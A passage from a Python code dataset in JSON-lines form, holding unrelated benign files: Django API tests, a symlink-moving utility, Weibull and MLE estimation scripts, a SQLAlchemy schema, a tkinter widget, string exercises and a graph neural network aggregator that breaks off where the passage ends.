new_record","repo_name":"titov-vv/jal","sub_path":"jal/widgets/trade_widget.py","file_name":"trade_widget.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"27"} +{"seq_id":"20857469859","text":"from django.urls import reverse\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase, 
force_authenticate\nfrom rest_framework.authtoken.models import Token\n\nfrom reviewsapi.models import Review\n\n\nclass ReviewListCreateRetrieveTests(APITestCase):\n \"\"\"Test case for listing, creating and retrieving reviews\"\"\"\n def setUp(self):\n self.username = 'johndoe'\n self.email = 'john@doe.com'\n self.password = 'trustno1'\n self.user = User.objects.create_user(self.username, self.email,\n self.password)\n self.token = Token.objects.get(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)\n\n def test_can_get_apiroot(self):\n \"\"\"Ensure the api root is configured\"\"\"\n url = reverse('api-root')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_can_list_reviews(self):\n \"\"\"Ensure we can list the reviews\"\"\"\n url = reverse('review-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_can_create_review(self):\n \"\"\"Ensure we can create a review\n\n Criteria: Users are able to submit reviews to the API\n Criteria: Submitted reviews must include, at least, the following attributes\n \"\"\"\n url = reverse('review-list')\n review = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 3,\n \"author\": \"John\",\n }\n response = self.client.post(url, review)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_cannot_create_review_rating_higher_than_5(self):\n \"\"\"Ensure we cannot create a review with a rating higher than 5\n\n Criteria: Rating - must be between 1 - 5\n \"\"\"\n url = reverse('review-list')\n review = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 6,\n \"author\": \"John\",\n }\n response = self.client.post(url, review)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_cannot_create_review_rating_lower_than_1(self):\n \"\"\"Ensure we cannot create a review with a rating lower than 1\n\n Criteria: Rating - must be between 1 - 5\n \"\"\"\n url = reverse('review-list')\n review = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 0,\n \"author\": \"John\",\n }\n response = self.client.post(url, review)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_can_retrieve_review(self):\n \"\"\"Ensure we can retrieve a review created by us\n\n Criteria: Users are able to retrieve reviews that they submitted\n \"\"\"\n review_data = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 3,\n \"author\": \"John\",\n \"ip_addr\": \"127.0.0.1\",\n \"user\": self.user,\n }\n review = Review.objects.create(**review_data)\n url = reverse('review-detail', args=(review.pk,))\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_cannot_retrieve_other_users_reviews(self):\n \"\"\"Ensure we cannot retrieve a review created by other users\n\n Criteria: Users cannot see reviews submitted by other users\n \"\"\"\n another_user = User.objects.create(username='anotheruser')\n review_data = {\n \"company\": \"SpaceX\",\n \"title\": \"My review\",\n \"summary\": \"This is the best place ever!\",\n \"rating\": 3,\n \"author\": \"John\",\n \"ip_addr\": \"127.0.0.1\",\n \"user\": another_user,\n }\n review = 
Review.objects.create(**review_data)\n        url = reverse('review-detail', args=(review.pk,))\n        response = self.client.get(url)\n        self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass ApiAuthTests(APITestCase):\n    \"\"\"Test case for detecting unauthenticated access to the api\"\"\"\n    def test_noauth_cannot_get_apiroot(self):\n        \"\"\"Nobody is allowed to access the API without auth token\n\n        Criteria: Use of the API requires a unique auth token for each user\n        \"\"\"\n        url = reverse('api-root')\n        response = self.client.get(url)\n        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n    def test_noauth_cannot_list_reviews(self):\n        \"\"\"Nobody is allowed to list reviews without proper authentication\"\"\"\n        url = reverse('review-list')\n        response = self.client.get(url)\n        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n    def test_noauth_cannot_create_review(self):\n        \"\"\"Nobody is allowed to create reviews without proper authentication\"\"\"\n        url = reverse('review-list')\n        review = {\n            \"company\": \"SpaceX\",\n            \"title\": \"My review\",\n            \"summary\": \"This is the best place ever!\",\n            \"rating\": 3,\n            \"author\": \"John\",\n        }\n        response = self.client.post(url, review)\n        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n","repo_name":"mscansian/reviewsapi","sub_path":"webservice/reviewsapi/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"335758344","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Move a symbolic link to another directory, adjusting the link contents.\"\"\"\n\n__author__ = \"\"\"Eugene M. Kim\"\"\"\n__email__ = 'astralblue@gmail.com'\n__version__ = '0.1.1'\n\nimport argparse\nimport errno\nimport logging\nimport os\nimport os.path\nimport stat\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n\nclass ArgumentError(RuntimeError):\n    \"\"\"An invalid argument was given.\n\n    `~BaseException.args` contain (*desc*, *src*, *dst*), where:\n\n    - *desc* is a human-readable description of the nature of the error;\n    - *src* is the source symbolic link;\n    - *dst* is the destination.\n    \"\"\"\n\n\nclass OperationError(RuntimeError):\n    \"\"\"An underlying operation failed.\n\n    :py:attr:`~BaseException.args` contain (*desc*), where *desc* is a\n    human-readable description of the failed operation.\n\n    The `__cause__` attribute may contain the underlying root cause exception;\n    it is often an `OSError`.\n    \"\"\"\n\n\ndef _do(action, descr):\n    logger.debug(descr)\n    try:\n        return action()\n    except Exception as e:\n        raise OperationError(\"cannot {}: {}\".format(descr, e)) from e\n\n\ndef _fsdecode(path):\n    return _do(lambda: os.fsdecode(path), \"normalize path {!r}\".format(path))\n\n\ndef _isdir(path):\n    return _do(lambda: os.path.isdir(path),\n               \"check if {!r} is a directory\".format(path))\n\n\ndef _unlink_if_exists(path):\n    try:\n        _do(lambda: os.unlink(path), \"unlink {!r}\".format(path))\n    except OperationError as e:\n        cause = e.__cause__\n        if not isinstance(cause, OSError) or cause.errno != errno.ENOENT:\n            raise\n\n\ndef move_symlink(src, dst):\n    \"\"\"Move a symbolic link to another directory, adjusting the link contents.\n\n    :param src: source symbolic link.\n    :type src: a :term:`path-like object`\n    :param dst:\n        destination; must either not exist or be an existing directory. 
If an\n        existing directory, the source symbolic link is moved into the\n        directory, keeping the same basename.\n    :type dst: a :term:`path-like object`\n    :raise `ArgumentError`: if *src* or *dst* is invalid.\n    :raise `OperationError`: if an underlying operation fails.\n    \"\"\"\n    src0 = src\n    dst0 = dst\n    src = _fsdecode(src0)\n    dst = _fsdecode(dst0)\n    srclink = _do(lambda: os.readlink(src), \"readlink {!r}\".format(src))\n    srcdir = os.path.dirname(src) or '.'\n    srcbase = os.path.basename(src)\n    assert srcbase\n    dstdir = os.path.dirname(dst) or '.'\n    dstbase = os.path.basename(dst)\n    logger.debug(\"src={!r}, srcdir={!r}, srcbase={!r}, \"\n                 \"dst={!r}, dstdir={!r}, dstbase={!r}\"\n                 .format(src, srcdir, srcbase, dst, dstdir, dstbase))\n    if _isdir(dst):\n        dst = os.path.join(dst, srcbase)\n        dstbase = os.path.basename(dst)\n        dstdir = os.path.dirname(dst)\n        assert dstbase == srcbase\n        logger.debug(\"assuming dstbase=srcbase; \"\n                     \"now dst={!r}, dstdir={!r}, dstbase={!r}\"\n                     .format(dst, dstdir, dstbase))\n    if not _isdir(dstdir):\n        raise ArgumentError(\"destination {!r} does not exist \"\n                            \"or is not a directory\"\n                            .format(dstdir), src0, dst0)\n    logger.debug(\"dstdir exists\")\n    if os.path.samefile(srcdir, dstdir) and srcbase == dstbase:\n        raise ArgumentError(\"source {!r} and destination {!r} \"\n                            \"refer to the same location\"\n                            .format(src, dst), src0, dst0)\n    if os.path.isabs(srclink):\n        dstlink = srclink\n    else:\n        srcreal = _do(lambda: os.path.realpath(src),\n                      \"obtain realpath for {!r}\".format(src))\n        dstlink = os.path.relpath(srcreal, dstdir)\n    logger.debug(\"srclink={!r}, dstlink={!r}\".format(srclink, dstlink))\n    srcstat = _do(lambda: os.stat(src, follow_symlinks=False),\n                  \"stat {!r}\".format(src))\n    _do(lambda: os.symlink(dstlink, dst),\n        \"symlink {!r} -> {!r}\".format(dst, dstlink))\n    try:\n        if os.geteuid() == 0:\n            _do(lambda: os.chown(dst, srcstat.st_uid, srcstat.st_gid,\n                                 follow_symlinks=False),\n                \"chown {!r} to {!r}:{!r}\"\n                .format(dst, srcstat.st_uid, srcstat.st_gid))\n        srcmode = stat.S_IMODE(srcstat.st_mode)\n        _do(lambda: os.chmod(dst, srcmode, follow_symlinks=False),\n            \"chmod {!r} to {:#o}\".format(dst, srcmode))\n        _unlink_if_exists(src)\n    except Exception:\n        _unlink_if_exists(dst)\n        raise\n\n\ndef main():\n    \"\"\"Run this module as a command.\"\"\"\n    parser = argparse.ArgumentParser()\n    logging.basicConfig(format=(\"{}: %(levelname)s: %(message)s\"\n                                .format(parser.prog)))\n    logger.setLevel(logging.WARNING)\n    parser.add_argument('--debug', action='store_const', const=True,\n                        help=\"\"\"enable debugging\"\"\")\n    parser.add_argument('src', nargs='+', help=\"\"\"source symbolic link\"\"\")\n    parser.add_argument('dst', help=\"\"\"destination symbolic link\"\"\")\n    parser.set_defaults(debug=False)\n    args = parser.parse_args()\n    if args.debug:\n        logger.setLevel(logging.DEBUG)\n\n    if len(args.src) > 1:\n        try:\n            dst_is_dir = _isdir(args.dst)\n        except OperationError as e:\n            logger.error(e, exc_info=(e if args.debug else None))\n            return 1\n        if not dst_is_dir:\n            logger.error(\"more than one source is given \"\n                         \"but destination {!r} is not a directory\"\n                         .format(args.dst))\n            return 1\n\n    ok = True\n    for src in args.src:\n        try:\n            move_symlink(src, args.dst)\n        except OperationError as e:\n            logger.error(e, exc_info=(e if args.debug else None))\n            ok = False\n\n    return 0 if ok else 1\n\n\nif __name__ == '__main__':\n    
sys.exit(main())\n","repo_name":"astralblue/movesymlink","sub_path":"movesymlink.py","file_name":"movesymlink.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33263077177","text":"import numpy as np\nimport math\n\ndef pdf(wsp, A, k):\n # returns the probability density at wind speed wsp for a weibull\n # distribution described by the parameters A and k.\n pdf = lambda x: k/A*(x/A)**(k-1)*np.exp(-(x/A)**k)\n\n return pdf(wsp)\n\ndef cdf(wsp, A, k):\n # returns the cumulative density at wind speed wsp for a weibull\n # distribution described by the parameters A and k.\n cdf = lambda x: 1 - np.exp(-(x/A)**k)\n\n return cdf(wsp)\n\ndef wsp_probs(Class=1, dx=2, Range= [4, 26.1]):\n # Weibull Parameters\n k = 2\n if Class == 1:\n A = 10/math.gamma(1+1/k)\n elif Class == 2:\n A = 8.5/math.gamma(1+1/k)\n elif Class == 3:\n A = 7.5/math.gamma(1+1/k)\n print(A)\n # Weibull cdf function\n cdf = lambda x: 1 - np.exp(-(x/A)**k)\n #Discrete wind speeds\n Y = np.arange(Range[0], Range[1], dx)\n\n # Probabilities of each wind speed\n P = [(cdf(y+dx/2) - cdf(y-dx/2))/dx for y in Y]\n\n return dict(zip(Y, P))\n\n\nif __name__ == '__main__':\n p = wsp_probs()","repo_name":"jaimeliew1/MasterThesis-TipDeflectionControl","sub_path":"Other/Weibull.py","file_name":"Weibull.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"24103853214","text":"from sqlalchemy import Column, MetaData, Table\nfrom sqlalchemy.sql.sqltypes import BigInteger, Integer, Numeric, Text\n\nmeta = MetaData()\n\nschema = [\n Table(\n \"zadatele\",\n meta,\n Column(\n \"id_prijemce\",\n BigInteger,\n nullable=False,\n primary_key=True,\n autoincrement=False,\n ),\n Column(\"rok\", Integer, nullable=False, primary_key=True, autoincrement=False),\n Column(\"jmeno_nazev\", Text, nullable=False),\n Column(\"obec\", Text, nullable=True),\n Column(\"okres\", Text, nullable=True),\n Column(\"castka_bez_pvp\", Numeric(12, 2), nullable=False),\n ),\n Table(\n \"platby\",\n meta,\n Column(\"id_prijemce\", BigInteger, nullable=False),\n Column(\"rok\", Integer, nullable=False),\n Column(\"fond_typ_podpory\", Text, nullable=False),\n Column(\"opatreni\", Text, nullable=False),\n Column(\"zdroje_cr\", Numeric(12, 2), nullable=True),\n Column(\"zdroje_eu\", Numeric(12, 2), nullable=True),\n Column(\"celkem_czk\", Numeric(12, 2), nullable=False),\n ),\n]\n\n\nif __name__ == \"__main__\":\n from sqlalchemy import create_engine\n from sqlalchemy.schema import CreateTable\n\n engine = create_engine(\"sqlite:///:memory:\")\n for table in schema:\n print(f\"-- {table.name} as created in SQLite\")\n print(CreateTable(table).compile(engine))\n","repo_name":"kokes/od","sub_path":"data/szif/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"27"} +{"seq_id":"7929292196","text":"from tkinter import *\nfrom tkinter import ttk\nfrom src.Palette import PaletteElem\n\n\nclass CharacterPicker(ttk.Frame):\n \"\"\"a widget for storing and letting the user modify a character\"\"\"\n\n def __init__(self, root, name=\"Character\", font_width=20, height=20, **kwargs):\n super().__init__(root, **kwargs)\n\n self.root = root\n\n self.font_width = font_width\n self.height = height\n\n self.change_callback = None\n\n # setup name\n self.name = 
StringVar(root, name)\n        self.name_label = ttk.Label(self, textvariable=self.name, style='TLabel')\n\n        # setup data visualization\n        self.char_vis = PaletteElem(self, font_width=font_width, height=height)\n        self.char_vis['style'] = 'PalettePressed.TFrame'\n\n        # setup user input\n        self.char_code = StringVar(root)\n        self.character_entry = ttk.Entry(self, textvariable=self.char_code, width=9)\n        self.character_entry.bind('<Return>', self.__acceptInput)\n\n        # organize layout\n        self.rowconfigure(0, weight=1)\n\n        self.name_label.grid(column=0, row=0, sticky='SW')\n        self.char_vis.grid(column=0, row=1, sticky='NSEW')\n        self.character_entry.grid(column=0, row=2, sticky='NSEW')\n\n    def changeForeground(self, foreground):\n        self.char_vis.data.foreground_color = foreground\n        self.char_vis.updateVis()\n\n    def getChar(self):\n        return self.char_vis.data.character\n\n    def setChar(self, char):\n        self.char_vis.data.character = char\n        self.char_vis.updateVis()\n\n    def onCharacterChanged(self, func):\n        \"\"\"calls [func] when the stored character is changed. Should accept a character as an argument\"\"\"\n\n        self.change_callback = func\n\n    def __acceptInput(self, event):\n        \"\"\"\n        Accepts input as either a character, a positive integer, or a hex-value.\n        A hex value must start with an [#] or else it will be detected as invalid input or an integer input\n        \"\"\"\n\n        if len(self.char_code.get()) > 0:\n            # detect character input\n            if len(self.char_code.get()) == 1:\n                self.char_vis.data.character = self.char_code.get()\n\n                if self.change_callback is not None:\n                    self.change_callback(self.getChar())\n\n                self.char_vis.updateVis()\n                return\n\n            # detect integer input\n            try:\n                code = int(self.char_code.get())\n                self.char_vis.data.character = chr(code)\n\n                if self.change_callback is not None:\n                    self.change_callback(self.getChar())\n\n                self.char_vis.updateVis()\n                return\n            except (ValueError, OverflowError):\n                pass\n\n            # detect hex input\n            if self.char_code.get()[0] == '#':\n                try:\n                    code = int(self.char_code.get()[1:], 16)\n                    self.char_vis.data.character = chr(code)\n\n                    if self.change_callback is not None:\n                        self.change_callback(self.getChar())\n\n                    self.char_vis.updateVis()\n                    return\n                except (ValueError, OverflowError):\n                    pass\n\n            print(f'Invalid input [{self.char_code.get()}]')\n    \n\n\n\n\nif __name__ == \"__main__\":\n    root = Tk()\n    root.minsize(300, 300)\n\n    root.columnconfigure(0, weight=1)\n    root.rowconfigure(0, weight=1)\n\n    c = CharacterPicker(root)\n    c.grid(column=0, row=0, sticky='NSEW')\n\n    root.mainloop()\n\n","repo_name":"karstensensensen/ARTEditor","sub_path":"src/CharacterPicker.py","file_name":"CharacterPicker.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42369432034","text":"from functools import wraps\nfrom time import process_time_ns\n\n\ndef time_taken(func):\n    # @wraps()\n    def inner(*args, **kwargs):\n        start = process_time_ns()\n        result = func(*args, **kwargs)\n        print(f\"TIME TAKEN:{process_time_ns() - start}\")\n        return result\n\n    return inner\n\n\n@time_taken\ndef getShiftedString(s, leftShifts, rightShifts):\n    print(\"leftshift\", leftShifts, \"rightShifts\", rightShifts)\n    str_len = len(s)\n    if leftShifts > str_len:\n        leftShifts = leftShifts % str_len\n    if rightShifts > str_len:\n        rightShifts = rightShifts % str_len\n\n    # print(\"original = \", s)\n    for _ in range(leftShifts):\n        s = s[1:] + s[0]\n        # print('leftshift =', s)\n    for _ in range(rightShifts):\n        s = s[-1] + s[:-1]\n        # print(\"rightshift =\", 
s)\n    return s\n\n\nif __name__ == \"__main__\":\n    assert getShiftedString(\"abcdef\", 10, 8) == \"cdefab\"\n    assert getShiftedString(\"abcdef\", 4, 8) == \"cdefab\"\n","repo_name":"udhayprakash/Python_for_interview_preparation","sub_path":"Practice/hackerrank/shifting_string.py","file_name":"shifting_string.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2469805285","text":"# 1 Gold Star\n\n# The built-in .split() procedure works\n# okay, but fails to find all the words on a page\n# because it only uses whitespace to split the\n# string. To do better, we should also use punctuation\n# marks to split the page into words.\n\n# Define a procedure, split_string, that takes two\n# inputs: the string to split and a string containing\n# all of the characters considered separators. The\n# procedure should return a list of strings that break\n# the source string up by the characters in the\n# splitlist.\n\n\ndef split_string(source,splitlist):\n    splitedStr = []\n    strLen = len(source)\n    i = 0\n    strTmp = '';\n    while i< strLen:\n        index = splitlist.find(source[i])\n        if(index==-1):\n            strTmp += source[i]\n        else:\n            if(strTmp != ''):\n                splitedStr.append(strTmp)\n                strTmp = ''\n        i += 1\n    if strTmp != '':\n        splitedStr.append(strTmp)\n    return splitedStr\n","repo_name":"PhenixI/introduction-of-computer-udacity","sub_path":"lesson4/lesson4_betterSplitting.py","file_name":"lesson4_betterSplitting.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30525991595","text":"'''\n------------------------------------------------------------------------\nThis is Bobae's main script for PS3 of MACS 40000: Structural Estimation.\n------------------------------------------------------------------------\n'''\n# import packages\nimport numpy as np\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport scipy as sp\nimport scipy.stats as sts\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\n\n# import data\ndata = DataFrame(pd.read_csv('MacroSeries.txt', header = None))\nct, kt, wt, rt = data[0], data[1], data[2], data[3]\n'''\n(a) Use the data (wt, kt) and equations (3) and (5) to estimate the\nfour parameters (alpha, rho, mu, sigma) by maximum likelihood.\n'''\ndef a_pdf(wt, kt, params):\n\n    alpha, rho, mu, sigma = params[0], params[1], params[2], params[3]\n\n    zt = np.log( wt / (1.0 - rho) / kt**alpha )\n    # zt = np.log(wt)- np.log(1.0 - rho) - alpha* np.log(kt)\n    zt_lag = []\n    for i in range(len(zt)):\n        if i == 0:\n            zt_lag.append(mu)\n        else:\n            zt_lag.append(zt[i - 1])\n\n    loc0 = (rho * Series(zt_lag)) + ((1.0 - rho) * mu)\n    pdf_vals = sts.norm.pdf(Series(zt), loc = loc0, scale = sigma)\n\n    return pdf_vals\n\ndef log_lik_a(wt, kt, params):\n\n    pdf_vals = a_pdf(wt, kt, params)\n    ln_pdf_vals = np.log(pdf_vals)\n    log_lik_val = ln_pdf_vals.sum()\n\n    return log_lik_val\n\ndef crit_a(params, *args):\n\n    wt, kt = args\n    log_lik_val = log_lik_a(wt, kt, params)\n    neg_log_lik_val = -log_lik_val\n\n    return neg_log_lik_val\n\n# initial attempt\na_mle_args = (wt, kt)\na_bounds = ((1e-10, 1 - 1e-10), (-1 + 1e-10, 1 - 1e-10), (1e-10, None), (1e-10, None))\na_alpha_0, a_rho_0, a_mu_0, a_sig_0 = 0.5, 0.5, 5.0, 5.0\na_params_1 = np.array([a_alpha_0, a_rho_0, a_mu_0, a_sig_0])\na_results1 = opt.minimize(crit_a, a_params_1, args=(a_mle_args), bounds = a_bounds,\n                        method = 'SLSQP', options ={'ftol': 
1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\na_alpha_MLE1, a_rho_MLE1, a_mu_MLE1, a_sig_MLE1 = a_results1.x\n# print(a_results1) # optimization succeeded!\n\n# second attempt with first MLE values (to get a hessian matrix)\na_params_2 = np.array([a_alpha_MLE1, a_rho_MLE1, a_mu_MLE1, a_sig_MLE1])\na_results2 = opt.minimize(crit_a, a_params_2, args=(a_mle_args), bounds = a_bounds,\n                        method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\na_alpha_MLE2, a_rho_MLE2, a_mu_MLE2, a_sig_MLE2 = a_results2.x\n# print(a_results2) # optimization succeeded!\n\nif True: # report the results\n    print('Report the MLE results for (a):')\n    print('alpha_MLE = ', a_alpha_MLE2, 'rho_MLE = ', a_rho_MLE2,\n          'mu_MLE = ', a_mu_MLE2, ' sig_MLE = ', a_sig_MLE2)\n    print('the value of the likelihood function = ', a_results2.fun)\n    print('VCV = ', a_results2.hess_inv.todense())\n\n'''\n(b) Use the data (rt, kt) and equations (4) and (5) to estimate the\nfour parameters (alpha, rho, mu, sigma) by maximum likelihood.\n'''\ndef b_pdf(rt, kt, params):\n\n    alpha, rho, mu, sigma = params[0], params[1], params[2], params[3]\n\n    zt = np.log(rt / (alpha * (kt**alpha)))\n    # zt = np.log(rt) - np.log(alpha) - alpha*np.log(kt)\n\n    zt_lag = []\n    for i in range(len(zt)):\n        if i == 0:\n            zt_lag.append(mu)\n        else:\n            zt_lag.append(zt[i - 1])\n\n    loc0 = (rho * Series(zt_lag)) + ((1.0 - rho) * mu)\n    pdf_vals = sts.norm.pdf(Series(zt), loc = loc0, scale = sigma)\n\n    return pdf_vals\n\ndef log_lik_b(rt, kt, params):\n\n    pdf_vals = b_pdf(rt, kt, params)\n    ln_pdf_vals = np.log(pdf_vals)\n    log_lik_val = ln_pdf_vals.sum()\n\n    return log_lik_val\n\ndef crit_b(params, *args):\n\n    rt, kt = args\n    log_lik_val = log_lik_b(rt, kt, params)\n    neg_log_lik_val = -log_lik_val\n\n    return neg_log_lik_val\n\n# initial attempt, using the MLE results from (a)\nb_mle_args = (rt, kt)\nb_bounds = ((1e-10, 1 - 1e-10), (-1 + 1e-10, 1 - 1e-10), (1e-10, None), (1e-10, None))\nb_alpha_0, b_rho_0, b_mu_0, b_sig_0 = 0.5, 0.5, 10.0, 1.0\nb_params_1 = np.array([b_alpha_0, b_rho_0, b_mu_0, b_sig_0])\nb_results1 = opt.minimize(crit_b, b_params_1, args=(b_mle_args), bounds = b_bounds,\n                        method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\nb_alpha_MLE1, b_rho_MLE1, b_mu_MLE1, b_sig_MLE1 = b_results1.x\n# print(b_results1) # optimization succeeded!\n\n# second attempt using the first MLE values\nb_params_2 = np.array([b_alpha_MLE1, b_rho_MLE1, b_mu_MLE1, b_sig_MLE1])\nb_results2 = opt.minimize(crit_b, b_params_2, args=(b_mle_args), bounds = b_bounds,\n                        method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\nb_alpha_MLE2, b_rho_MLE2, b_mu_MLE2, b_sig_MLE2 = b_results2.x\n# print(b_results2) # optimization succeeded with smaller score!\n\n# third attempt using the second MLE values\nb_params_3 = np.array([b_alpha_MLE2, b_rho_MLE2, b_mu_MLE2, b_sig_MLE2])\nb_results3 = opt.minimize(crit_b, b_params_3, args=(b_mle_args), bounds = b_bounds,\n                        method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\nb_alpha_MLE3, b_rho_MLE3, b_mu_MLE3, b_sig_MLE3 = b_results3.x\n# print(b_results3) # optimization succeeded with smaller score! 
(another attempt yields the same score)\n\nif True: # report the result\n print('Report the MLE results for (b):')\n print('alpha_MLE = ', b_alpha_MLE3, 'rho_MLE = ', b_rho_MLE3,\n 'mu_MLE = ', b_mu_MLE3, ' sig_MLE = ', b_sig_MLE3)\n print('the value of the likelihood function = ', b_results3.fun)\n print('VCV = ', b_results3.hess_inv.todense())\n\n'''\n(c) According to your estimates from part (a), if investment/savings\nin the current period is kt = 7,500,000 and the productivity shock in the\nprevious period was zt_lag = 10, what is the probability that the interest\nrate this period will be greater than rt = 1?\n'''\nz_star = np.log(1 / (a_alpha_MLE2 * (7500000)**a_alpha_MLE2))\nloc_c = (a_rho_MLE2 * Series(10)) + ((1.0 - a_rho_MLE2) * a_mu_MLE2)\nc_prob = 1 - sts.norm.cdf(z_star, loc = loc_c, scale = a_sig_MLE2)\nif True: # report the result\n print('Pr(rt > 1 | theta-hat, kt = 7500000, z_lag = 10) = ', c_prob)\n","repo_name":"bobaekang/uc-mlpp","sub_path":"previous_code/MACS_40200_winter_17/Kang_StructEst_PS3.py","file_name":"Kang_StructEst_PS3.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19016032948","text":"import torch\nfrom torch import nn\nfrom torch.nn.modules.module import Module\nimport numpy as np\nimport networkx as nx\nimport pandas as pd\nfrom torch import optim\nimport seaborn as sns\nimport random\nfrom itertools import permutations, combinations\nfrom matplotlib import pyplot as plt\n\n\nclass MeanAggregator(Module):\n '''\n This class does the sampling and aggregating given a set of features\n\n We store everything except the set of nodes to aggregate on the class\n\n We pass the nodes (batch, neg samples, etc) to forward\n '''\n def __init__(\n self,\n features,\n feature_dim,\n emb_dim,\n n_nbr_samples,\n g,\n dropout=0.5,\n depth=1,\n batchnorm=True,\n ):\n super(MeanAggregator, self).__init__()\n self.feature_dim = feature_dim\n self.depth = depth\n if batchnorm:\n self.fc = nn.Sequential(\n nn.Linear(feature_dim, emb_dim),\n nn.BatchNorm1d(emb_dim),\n nn.Tanh(),\n nn.Dropout(dropout),\n )\n else:\n self.fc = nn.Sequential(\n nn.Linear(feature_dim, emb_dim),\n nn.Tanh(),\n nn.Dropout(dropout),\n )\n self.features = features\n self.n_nbr_samples = n_nbr_samples\n self.g = g # can be any dict like: {node: collection(nbrs)}\n self.random_ = np.random.choice\n self.set_ = set\n\n def forward(\n self,\n node_list,\n randomize_features=False,\n ):\n '''\n features is (unique_node_dim by feature_dim)\n mask is (node_list by unique_node_dim)\n '''\n samples = [\n list(self.random_(\n list(self.g[node]),\n self.n_nbr_samples,\n replace=False,\n )) + [node]\n if len(self.g[node]) >= self.n_nbr_samples else list(self.g[node]) + [node]\n for node in node_list\n ]\n unique_nodes_list = list(set.union(*(self.set_(x) for x in samples)))\n unique_nodes_dict = {node: idx for idx, node in enumerate(unique_nodes_list)}\n\n mask = torch.zeros(len(samples), len(unique_nodes_list))\n\n row_idxs = []\n col_idxs = []\n for node_idx, node_nbrs in enumerate(samples):\n for alter in node_nbrs:\n row_idxs.append(node_idx)\n col_idxs.append(unique_nodes_dict[alter])\n sampled_features = self.fc(self.features(unique_nodes_list))\n mask[row_idxs, col_idxs] = 1\n mask = mask.div(mask.sum(dim=1).unsqueeze(1))\n if randomize_features:\n mask = mask[torch.randperm(mask.size()[0])]\n return mask.mm(sampled_features)\n\n\nclass EncodingLayer(Module):\n '''\n Forward takes a batch and an 
aggregator\n It runs one iter of the aggregator and then applies the encoding layer to it\n '''\n def __init__(\n self,\n features,\n feature_dim,\n emb_input_dim,\n emb_dim,\n g,\n agg,\n base_model=None,\n dropout=0.5,\n depth=1,\n batchnorm=True,\n ):\n super(EncodingLayer, self).__init__()\n self.features = features\n self.emb_dim = emb_dim\n self.g = g\n self.agg = agg\n self.depth = depth\n if base_model:\n self.base_model = base_model\n self.fc = nn.Sequential(\n nn.Linear(emb_input_dim, emb_dim),\n nn.BatchNorm1d(emb_dim),\n nn.Tanh(),\n nn.Dropout(dropout),\n )\n\n\n def forward(self, node_list, randomize_features=False):\n emb = self.agg(\n node_list=node_list,\n randomize_features=randomize_features,\n )\n emb = self.fc(\n emb\n )\n return emb\n\n\nclass MeanModel(Module):\n def __init__(\n self,\n emb_dim,\n n_nbr_samples1,\n n_nbr_samples2,\n g,\n features,\n hidden_dim=8,\n dropout=0.5,\n ):\n super(MeanModel, self).__init__()\n feature_dim = features.size()[1]\n self.agg1 = MeanAggregator(\n features=lambda x: features[x],\n feature_dim=feature_dim,\n emb_dim=hidden_dim,\n n_nbr_samples=n_nbr_samples1,\n g=g,\n dropout=dropout,\n batchnorm=True,\n )\n self.enc1 = EncodingLayer(\n features=lambda x: features[x],\n feature_dim=feature_dim,\n emb_input_dim=hidden_dim,\n emb_dim=hidden_dim,\n g=g,\n agg=self.agg1,\n base_model=None,\n depth=2,\n dropout=dropout,\n batchnorm=True,\n )\n self.agg2 = MeanAggregator(\n features=lambda x: self.enc1(x),\n feature_dim=hidden_dim,\n emb_dim=hidden_dim,\n 